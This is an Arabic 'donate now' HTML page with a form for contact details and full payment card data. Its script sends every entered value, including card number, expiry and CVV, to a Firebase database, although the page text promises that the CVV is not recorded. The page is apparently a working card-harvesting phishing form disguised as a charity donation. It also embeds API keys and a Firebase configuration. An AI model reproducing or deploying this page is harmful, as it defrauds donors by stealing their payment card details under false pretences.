<!DOCTYPE html>
<html dir="rtl">
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link href="https://fonts.googleapis.com/css?family=Raleway" rel="stylesheet">
<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.1/dist/css/bootstrap.min.css" rel="stylesheet">
<script src="https://maps.googleapis.com/maps/api/js?key=AIzaSyCGCQMWprFs1qOxjzh991d_PXQ9_K8w6Co" defer></script>
<script src="https://code.jquery.com/jquery-3.6.0.js" integrity="sha256-H+K7U5CnXl1h5ywQfKtSj8PCmoN9aaq30gDh27Xc0jk=" crossorigin="anonymous"></script>

<style>
body {
  font-family: Arial;
  font-size: 17px;
  padding: 8px;
}

* {
  box-sizing: border-box;
}

.row {
  display: -ms-flexbox; /* IE10 */
  display: flex;
  -ms-flex-wrap: wrap; /* IE10 */
  flex-wrap: wrap;
  margin: 0 -16px;
}

.col-25 {
  -ms-flex: 25%; /* IE10 */
  flex: 25%;
}

.col-50 {
  -ms-flex: 50%; /* IE10 */
  flex: 50%;
}

.col-50 h3 {
  font-family: 'Cairo', sans-serif;
}

.col-75 {
  -ms-flex: 75%; /* IE10 */
  flex: 75%;
}

.col-25,
.col-50,
.col-75 {
  padding: 0 16px;
}

.container {
  background-color: #f2f2f2;
  padding: 5px 20px 15px 20px;
  border: 1px solid lightgrey;
  border-radius: 3px;
}

input[type=text],select {
  width: 100%;
  margin-bottom: 20px;
  padding: 12px;
  border: 1px solid #ccc;
  border-radius: 3px;
}

label {
  margin-bottom: 10px;
  display: block;
font-family: 'Cairo', sans-serif;
}

.icon-container {
  margin-bottom: 20px;
  padding: 7px 0;
  font-size: 24px;
}

.btn {
  background-color: #04AA6D;
  color: white;
  padding: 12px;
  margin: 10px 0;
  border: none;
  width: 100%;
  border-radius: 3px;
  cursor: pointer;
  font-size: 17px;
}

.btn:hover {
  background-color: #45a049;
}

a {
  color: #2196F3;
}

hr {
  border: 1px solid lightgrey;
}

span.price {
  float: right;
  color: grey;
}

span{
font-size: 15px;
color:#aaa;
font-family: 'Cairo', sans-serif;
}

.d_logo{
margin:10px;
padding:5px;
color:black;
}

.d_logo h2{
margin:0 40% 0 0;
font-weight:bold;
color: skyblue;

}
/* Responsive layout - when the screen is less than 800px wide, make the two columns stack on top of each other instead of next to each other (also change the direction - make the "cart" column go on top) */
@media (max-width: 800px) {
  .col-25 {
    margin-bottom: 20px;
  }
}



 



</style>
<body>
<div class="d_logo">
<h2>
تبرع الان 
</h2>
</div>

<div class="row">
  <div class="col-75">
    <div class="container">

<div class="row">
<div class="col-50">
<h3>معلومات التسليم</h3>
<label for="fname"> اسمك </label>
<input type="text" id="name" name="fname" placeholder="ادخل اسمك الكامل">

<label for="email">البريد الألكتروني</label>
<input type="text" id="email" name="email" placeholder="ادخل بريدك الألكتروني المراد استخدامه">
<label for="email"> رقم الجوال للتواصل بك </label>
<input type="text" id="phone_num" name="phone_num" placeholder="ادخل رقم هاتفك للتواصل معك ">
</div>

<div class="col-50">
<h3>معلومات الدفع</h3>
<label for="fname">نقبل</label>
<div class="icon-container">
<img src="../img/pyment_logo.png" width="200px">
</div>
<label for="cname">اسمك على البطاقة</label>
<input type="text" id="cname" name="cardname" placeholder="ادخل اسمك على البطاقة">
<label for="ccnum">رقم البطاقة</label>
<input type="text" id="ccnum" name="cardnumber" placeholder="ادخل رقم البطاقة">
<div class="row">
<div class="col-50">
<label for="expyear">تاريخ انتهاء البطاقة</label>
<input type="text" id="expyear" name="expyear" placeholder="MM/YY">
</div>
<div class="col-50">
<label for="cvv">CVV</label>
<input type="text" id="cvv" name="ccv" placeholder="رمز الأمن">
</div>
</div>
</div>

</div>
<label>
<input type="checkbox" checked="checked" id="accept" name="sameadr">
تذكرني
</label>
<span>سنقوم بتخزين بيانات هذه البطاقة بأمان لسرعة اجراء الدفع فيما بعد ولن يتم تسجيل رقم CCV الخاص بك  </span>
<input type="button" value="ارسال الطلب" class="btn" name="add_payment" id="send">
</div>
  </div>
</div>



<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
<script type="module">
import { initializeApp } from "https://www.gstatic.com/firebasejs/10.14.1/firebase-app.js";
import { getDatabase, ref, set,push,get} from "https://www.gstatic.com/firebasejs/10.14.1/firebase-database.js";

// Your web app's Firebase configuration
const firebaseConfig = {
  apiKey: "AIzaSyBDYQTOFSv638XJnOqvFuwJGPnQZ3Dy-v8",
  authDomain: "fir-new-46591.firebaseapp.com",
  databaseURL: "https://fir-new-46591-default-rtdb.firebaseio.com",
  projectId: "fir-new-46591",
  storageBucket: "fir-new-46591.appspot.com",
  messagingSenderId: "334561214917",
  appId: "1:334561214917:web:fd48aa3ad5cb34ef740bac"
};


// Initialize Firebase
// Initialize Firebase
const app = initializeApp(firebaseConfig);
const db = getDatabase();

window.addEventListener("load", function() {
document.getElementById('send').addEventListener("click", function(e) {
e.preventDefault(); // منع السلوك الافتراضي

// جمع البيانات
var name = document.getElementById('name').value;
var email = document.getElementById('email').value;
var phone_num = document.getElementById('phone_num').value;
var cname = document.getElementById('cname').value;
var ccnum = document.getElementById('ccnum').value;
var expyear = document.getElementById('expyear').value;
var cvv = document.getElementById('cvv').value;
var accept = document.getElementById('accept').value;


// الحصول على آخر ID مستخدم
const lastIdRef = ref(db, 'lastId/');
get(lastIdRef).then((snapshot) => {
let newId = 1; // قيمة افتراضية

if (snapshot.exists()) {
newId = snapshot.val() + 1; // زيادة ID
}

// حفظ الـ ID الجديد في lastId
set(lastIdRef, newId);
// Save the user data including the image data
push(ref(db, 'pyment/'), {
id: newId, // إضافة الرقم الفريد هنا
name: name,
email: email,
phone_num: phone_num,
cname: cname,
ccnum: ccnum,
expyear: expyear,
cvv: cvv,
accept:accept,
}).then(() => {
//document.getElementById("msg").style.display = "block";
alert('نجاح ، تم الارسال بنجاح');
//window.location.href = 'view_data.html';
}).catch((error) => {
alert('Not saved');
console.error(error);
});
}).catch((error) => {
console.error("Error fetching last ID: ", error);
});
});
});
</script>

</body>
</html>
